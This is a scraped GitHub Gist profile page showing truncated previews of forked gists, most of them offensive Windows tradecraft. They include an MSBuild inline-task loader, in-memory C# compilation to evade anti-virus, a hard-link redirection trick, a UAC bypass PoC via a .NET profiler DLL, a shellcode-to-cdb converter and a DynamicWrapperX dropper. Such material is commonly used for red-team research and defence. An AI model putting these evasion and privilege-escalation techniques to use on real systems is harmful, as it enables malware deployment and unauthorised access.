Skip to content

Instantly share code, notes, and snippets.


Block or report user

Report or block caseysmithrc

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
caseysmithrc / JankyAF.csproj
Created Jul 17, 2019 — forked from bohops/JankyAF.csproj
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
View JankyAF.csproj
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
caseysmithrc / CompileInMemory.cs
Created Jul 8, 2019 — forked from TheKevinWang/CompileInMemory.cs
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: However, this will still execute csc.exe and drop a dll to %temp%
View CompileInMemory.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Reflection;
namespace InMemoryCompiler
class Program
caseysmithrc /
Last active Jul 22, 2019
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.


caseysmithrc / UserWritableLocations.ps1
Created Jul 4, 2019 — forked from hinchley/UserWritableLocations.ps1
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article:
View UserWritableLocations.ps1
# Paths that we've already excluded via AppLocker.
$exclusions = @()
# Paths to process.
$paths = @(
# Setup log.
$log = "$PSScriptRoot\UserWritableLocations.log"
caseysmithrc / UAC-dotnet-profiler-poc.ps1
Created Jul 2, 2019 — forked from clavoillotte/UAC-dotnet-profiler-poc.ps1
PoC of UAC bypass with a .NET profiler DLL
View UAC-dotnet-profiler-poc.ps1
# Bypass UAC with a .NET profiler DLL
# GUID, path and content
$GUID = '{' + [guid]::NewGuid() + '}'
$DllPath = $env:TEMP + "\test.dll"
caseysmithrc / malicious.cs
Created Jun 15, 2019 — forked from Arno0x/malicious.cs
Hide malicious assembly in another one with RunTime code compiling
View malicious.cs
Author: Arno0x0x, Twitter: @Arno0x0x
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
caseysmithrc /
Created Jun 7, 2019 — forked from cji/
Steps to successfully debug the Windows kernel between 2 VMWare VMs

Open the debugger VM's .vmx file. delete the existing serial0 lines (used for printing, not needed) add these lines:

serial0.present = "TRUE"
serial0.pipe.endPoint = "client"
serial0.fileType = "pipe"
serial0.yieldOnMsrRead = "TRUE"
serial0.tryNoRxLoss = "FALSE"
serial0.startConnected = "TRUE"
caseysmithrc /
Created Jun 7, 2019 — forked from 3xocyte/
shellcode to cbd.exe
#!/usr/bin/env python
# run: cdb.exe -cf output.wds -o calc.exe
# From:
src = open('shellcode', 'r')
sc =
copy = ";eb @$t0+"
caseysmithrc / dynwrapx.js
Created Jun 2, 2019
DynamicWrapperX Dropper - Code Registration Example
View dynwrapx.js
//Example Reference:
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version=""/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
var fso = new ActiveXObject("Scripting.FileSystemObject");
var dropPath = fso.GetSpecialFolder(2);
// Create Base64 Object, supports encode, decode
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac
You can’t perform that action at this time.